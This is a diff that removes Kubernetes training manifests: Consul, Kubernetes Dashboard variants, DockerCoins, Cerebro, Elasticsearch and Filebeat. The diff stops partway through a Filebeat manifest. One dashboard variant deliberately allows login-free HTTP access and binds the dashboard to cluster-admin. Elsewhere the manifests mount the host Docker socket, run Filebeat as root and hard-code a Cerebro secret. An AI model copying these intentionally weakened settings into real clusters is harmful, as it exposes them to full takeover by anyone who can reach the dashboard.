terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.11"
volumeMounts:
- name: data
mountPath: /consul/data
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command: [ "sh", "-c", "consul leave" ]

View File

@@ -1,340 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
apiVersion: v1
kind: ServiceAccount
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
data: null
kind: ConfigMap
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-key-holder
- kubernetes-dashboard-certs
- kubernetes-dashboard-csrf
resources:
- secrets
verbs:
- get
- update
- delete
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-settings
resources:
- configmaps
verbs:
- get
- update
- apiGroups:
- ""
resourceNames:
- heapster
- dashboard-metrics-scraper
resources:
- services
verbs:
- proxy
- apiGroups:
- ""
resourceNames:
- heapster
- 'http:heapster:'
- 'https:heapster:'
- dashboard-metrics-scraper
- http:dashboard-metrics-scraper
resources:
- services/proxy
verbs:
- get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Service
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- name: http
port: 443
targetPort: http
selector:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --sidecar-host=http://127.0.0.1:8000
- --enable-skip-login
- --enable-insecure-login
image: kubernetesui/dashboard:v2.7.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 9090
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: kubernetes-dashboard
ports:
- containerPort: 9090
name: http
protocol: TCP
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /certs
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: dashboard-metrics-scraper
ports:
- containerPort: 8000
protocol: TCP
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- emptyDir: {}
name: tmp-volume
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
creationTimestamp: null
name: kubernetes-dashboard:insecure
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard

View File

@@ -1,325 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
apiVersion: v1
kind: ServiceAccount
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
data: null
kind: ConfigMap
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-key-holder
- kubernetes-dashboard-certs
- kubernetes-dashboard-csrf
resources:
- secrets
verbs:
- get
- update
- delete
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-settings
resources:
- configmaps
verbs:
- get
- update
- apiGroups:
- ""
resourceNames:
- heapster
- dashboard-metrics-scraper
resources:
- services
verbs:
- proxy
- apiGroups:
- ""
resourceNames:
- heapster
- 'http:heapster:'
- 'https:heapster:'
- dashboard-metrics-scraper
- http:dashboard-metrics-scraper
resources:
- services/proxy
verbs:
- get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Service
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- name: https
port: 443
targetPort: https
selector:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --sidecar-host=http://127.0.0.1:8000
image: kubernetesui/dashboard:v2.7.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8443
scheme: HTTPS
initialDelaySeconds: 30
timeoutSeconds: 30
name: kubernetes-dashboard
ports:
- containerPort: 8443
name: https
protocol: TCP
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /certs
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: dashboard-metrics-scraper
ports:
- containerPort: 8000
protocol: TCP
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- emptyDir: {}
name: tmp-volume

View File

@@ -1,355 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
apiVersion: v1
kind: ServiceAccount
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
data: null
kind: ConfigMap
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: kubernetes-dashboard-metrics
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
rules:
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-key-holder
- kubernetes-dashboard-certs
- kubernetes-dashboard-csrf
resources:
- secrets
verbs:
- get
- update
- delete
- apiGroups:
- ""
resourceNames:
- kubernetes-dashboard-settings
resources:
- configmaps
verbs:
- get
- update
- apiGroups:
- ""
resourceNames:
- heapster
- dashboard-metrics-scraper
resources:
- services
verbs:
- proxy
- apiGroups:
- ""
resourceNames:
- heapster
- 'http:heapster:'
- 'https:heapster:'
- dashboard-metrics-scraper
- http:dashboard-metrics-scraper
resources:
- services/proxy
verbs:
- get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: kubernetes-dashboard
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Service
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
kubernetes.io/cluster-service: "true"
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
ports:
- name: https
port: 443
targetPort: https
selector:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/name: kubernetes-dashboard
strategy:
rollingUpdate:
maxSurge: 0
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
annotations: null
labels:
app.kubernetes.io/component: kubernetes-dashboard
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
spec:
containers:
- args:
- --namespace=kubernetes-dashboard
- --auto-generate-certificates
- --sidecar-host=http://127.0.0.1:8000
image: kubernetesui/dashboard:v2.7.0
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8443
scheme: HTTPS
initialDelaySeconds: 30
timeoutSeconds: 30
name: kubernetes-dashboard
ports:
- containerPort: 8443
name: https
protocol: TCP
resources:
limits:
cpu: 2
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /certs
name: kubernetes-dashboard-certs
- mountPath: /tmp
name: tmp-volume
- image: kubernetesui/metrics-scraper:v1.0.8
imagePullPolicy: IfNotPresent
livenessProbe:
httpGet:
path: /
port: 8000
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 30
name: dashboard-metrics-scraper
ports:
- containerPort: 8000
protocol: TCP
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
runAsGroup: 2001
runAsUser: 1001
volumeMounts:
- mountPath: /tmp
name: tmp-volume
securityContext:
seccompProfile:
type: RuntimeDefault
serviceAccountName: kubernetes-dashboard
volumes:
- name: kubernetes-dashboard-certs
secret:
secretName: kubernetes-dashboard-certs
- emptyDir: {}
name: tmp-volume
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
creationTimestamp: null
name: kubernetes-dashboard:cluster-admin
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: cluster-admin
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: ServiceAccount
metadata:
creationTimestamp: null
name: cluster-admin
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
type: kubernetes.io/service-account-token
metadata:
name: cluster-admin-token
namespace: kubernetes-dashboard
annotations:
kubernetes.io/service-account.name: cluster-admin

View File

@@ -1,28 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: build-image
spec:
restartPolicy: OnFailure
containers:
- name: docker-build
image: docker
env:
- name: REGISTRY_PORT
value: #"30000"
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
mkdir /workspace &&
git clone https://github.com/jpetazzo/container.training /workspace &&
docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
docker push localhost:$REGISTRY_PORT/worker
volumeMounts:
- name: docker-socket
mountPath: /var/run/docker.sock
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock

View File

@@ -1,160 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: hasher
name: hasher
spec:
replicas: 1
selector:
matchLabels:
app: hasher
template:
metadata:
labels:
app: hasher
spec:
containers:
- image: dockercoins/hasher:v0.1
name: hasher
---
apiVersion: v1
kind: Service
metadata:
labels:
app: hasher
name: hasher
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: hasher
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: redis
name: redis
spec:
replicas: 1
selector:
matchLabels:
app: redis
template:
metadata:
labels:
app: redis
spec:
containers:
- image: redis
name: redis
---
apiVersion: v1
kind: Service
metadata:
labels:
app: redis
name: redis
spec:
ports:
- port: 6379
protocol: TCP
targetPort: 6379
selector:
app: redis
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: rng
name: rng
spec:
replicas: 1
selector:
matchLabels:
app: rng
template:
metadata:
labels:
app: rng
spec:
containers:
- image: dockercoins/rng:v0.1
name: rng
---
apiVersion: v1
kind: Service
metadata:
labels:
app: rng
name: rng
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: rng
type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: webui
name: webui
spec:
replicas: 1
selector:
matchLabels:
app: webui
template:
metadata:
labels:
app: webui
spec:
containers:
- image: dockercoins/webui:v0.1
name: webui
---
apiVersion: v1
kind: Service
metadata:
labels:
app: webui
name: webui
spec:
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: webui
type: NodePort
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: worker
name: worker
spec:
replicas: 1
selector:
matchLabels:
app: worker
template:
metadata:
labels:
app: worker
spec:
containers:
- image: dockercoins/worker:v0.1
name: worker

View File

@@ -1,69 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: cerebro
name: cerebro
spec:
selector:
matchLabels:
app: cerebro
template:
metadata:
labels:
app: cerebro
spec:
volumes:
- name: conf
configMap:
name: cerebro
containers:
- image: lmenezes/cerebro
name: cerebro
volumeMounts:
- name: conf
mountPath: /conf
args:
- -Dconfig.file=/conf/application.conf
env:
- name: ELASTICSEARCH_PASSWORD
valueFrom:
secretKeyRef:
name: demo-es-elastic-user
key: elastic
---
apiVersion: v1
kind: Service
metadata:
labels:
app: cerebro
name: cerebro
spec:
ports:
- port: 9000
protocol: TCP
targetPort: 9000
selector:
app: cerebro
type: NodePort
---
apiVersion: v1
kind: ConfigMap
metadata:
name: cerebro
data:
application.conf: |
secret = "ki:s:[[@=Ag?QI`W2jMwkY:eqvrJ]JqoJyi2axj3ZvOv^/KavOT4ViJSv?6YY4[N"
hosts = [
{
host = "http://demo-es-http.eck-demo.svc.cluster.local:9200"
name = "demo"
auth = {
username = "elastic"
password = ${?ELASTICSEARCH_PASSWORD}
}
}
]

View File

@@ -1,19 +0,0 @@
apiVersion: elasticsearch.k8s.elastic.co/v1
kind: Elasticsearch
metadata:
name: demo
namespace: eck-demo
spec:
http:
tls:
selfSignedCertificate:
disabled: true
nodeSets:
- name: default
count: 1
config:
node.data: true
node.ingest: true
node.master: true
node.store.allow_mmap: false
version: 7.5.1

View File

@@ -1,168 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: eck-demo
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.inputs:
- type: container
paths:
- /var/log/containers/*.log
processors:
- add_kubernetes_metadata:
host: ${NODE_NAME}
matchers:
- logs_path:
logs_path: "/var/log/containers/"
# To enable hints based autodiscover, remove `filebeat.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# node: ${NODE_NAME}
# hints.enabled: true
# hints.default_config:
# type: container
# paths:
# - /var/log/containers/*${data.kubernetes.container.id}.log
processors:
- add_cloud_metadata:
- add_host_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: filebeat
namespace: eck-demo
labels:
k8s-app: filebeat
spec:
selector:
matchLabels:
k8s-app: filebeat
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
hostNetwork: true
dnsPolicy: ClusterFirstWithHostNet
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat:7.5.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: demo-es-http
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
valueFrom:
secretKeyRef:
name: demo-es-elastic-user
key: elastic
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
